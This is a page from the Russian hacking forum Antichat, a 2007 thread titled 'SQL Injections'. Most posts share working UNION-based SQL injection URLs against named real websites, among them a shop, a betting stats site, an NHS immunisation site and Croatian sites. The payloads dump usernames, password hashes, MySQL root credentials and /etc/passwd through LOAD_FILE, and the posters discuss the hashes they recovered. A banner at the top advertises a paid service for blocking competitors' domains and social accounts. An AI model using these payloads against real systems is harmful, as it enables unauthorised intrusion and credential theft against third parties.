Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 162 из 1242

162

Опции темы

Поиск в этой теме

Опции просмотра

#1611

04.04.2007, 13:12

kamaz

Познающий

Регистрация: 31.01.2007

Сообщений: 88

Провел на форуме:
631013

Репутация: 453

Отправить сообщение для kamaz с помощью ICQ

Код:

http://www.clabbergirl.com/store/store.php?mode=cat&cat_id=-3%20union%20select%201,user_Username,3,user_password,5%20from%20users/*

Шоп какой-то. Пароли открыты
__

__

И кстати, если вы задолбались убирать пробелы из скулей, просто нажмите на кнопку "цитировать".

Последний раз редактировалось kamaz; 04.04.2007 в 13:16.. Причина: Забыл поставить "/" :)

#1612

04.04.2007, 13:23

p-range

Участник форума

Регистрация: 05.02.2006

Сообщений: 168

Провел на форуме:
749524

Репутация: 715

Отправить сообщение для p-range с помощью ICQ

Цитата:

Пароли открыты

Цитата:

1$WEVsiCKUmcU

больше похоже на md5 unix

#1613

04.04.2007, 13:36

kamaz

Познающий

Регистрация: 31.01.2007

Сообщений: 88

Провел на форуме:
631013

Репутация: 453

Согласен, похоже, но на сколько я знаю, md5 unix состоит из 31 символа

#1614

04.04.2007, 13:57

p-range

Участник форума

Регистрация: 05.02.2006

Сообщений: 168

Провел на форуме:
749524

Репутация: 715

ну да, видно тут какая-то своя криптовка пасса...

#1615

04.04.2007, 14:08

Woldemar

Познающий

Регистрация: 09.06.2005

Сообщений: 72

Провел на форуме:
348081

Репутация: 20

Отправить сообщение для Woldemar с помощью ICQ

http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=
137&sid=2007&stats=true&id=-1%20union%20select%
20LOAD_FILE(concat(char(47,101,116,99,47,112,97,11 5,
115,119,100))),2+limit+1/*

Помогите ка раскачать

#1616

04.04.2007, 14:35

maxster

Участник форума

Регистрация: 27.10.2006

Сообщений: 205

Провел на форуме:
2298631

Репутация: 380

Отправить сообщение для maxster с помощью ICQ

Цитата:

/etc/passwd

Код:

http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+LOAD_FILE(0x2f6574632f706173737764),2/*

MySQL root (видимо без пасса)

Код:

http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+concat(user,char(58),password),2+from+mysql.user/*

Последний раз редактировалось maxster; 04.04.2007 в 14:39..

#1617

04.04.2007, 14:53

Woldemar

Познающий

Регистрация: 09.06.2005

Сообщений: 72

Провел на форуме:
348081

Репутация: 20

Цитата:

Сообщение от maxster

/etc/passwd

Код:

http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+LOAD_FILE(0x2f6574632f706173737764),2/*

MySQL root (видимо без пасса)

Код:

http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+concat(user,char(58),password),2+from+mysql.user/*

Не понял etc/passwd а что дальше то.

сорри

#1618

04.04.2007, 16:04

Fr-Ron

Участник форума

Регистрация: 10.09.2006

Сообщений: 185

Провел на форуме:
1654589

Репутация: 337

Еще один магазин. Таблица users, а выводит, по всей видимости, названия моделей =(

Цитата:

http://www.provideo.ru/index.php?action=list&page=1&category=-51+union+select+1,password+from+users+limit+0,1/*&f=c

#1619

04.04.2007, 16:06

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

Одна из идеальных =)

Код:

http://www.immunisation.nhs.uk/article.php?id=9999999'+union+select+1,2,concat_ws(char(58),name,username,password),concat(version(),char(58),user()),5,6,7,8,9+from+user+limit+2,2/*

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

#1620

04.04.2007, 16:32

XTErner

Участник форума

Регистрация: 13.03.2007

Сообщений: 120

Провел на форуме:
1604641

Репутация: 590

Код:

http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+INFORMATION_SCHEMA.TABLES+limit+7,1/*

Код:

http://www.hnk.hr/hr/predstava.php?id=-18+union+select+1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(concat(login,0x3a,password),0x71),0x71),10,11,12,13,14,15+from+users/*

Код:

http://www.gamer.hr/najave/swat4_ssynd.php?id=-210%20UNION%20SELECT%201,concat(email,0x3a,password),3,4,5,6,7,8,9+from+user+limit+3,1/*

Страница 162 из 1242

162

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход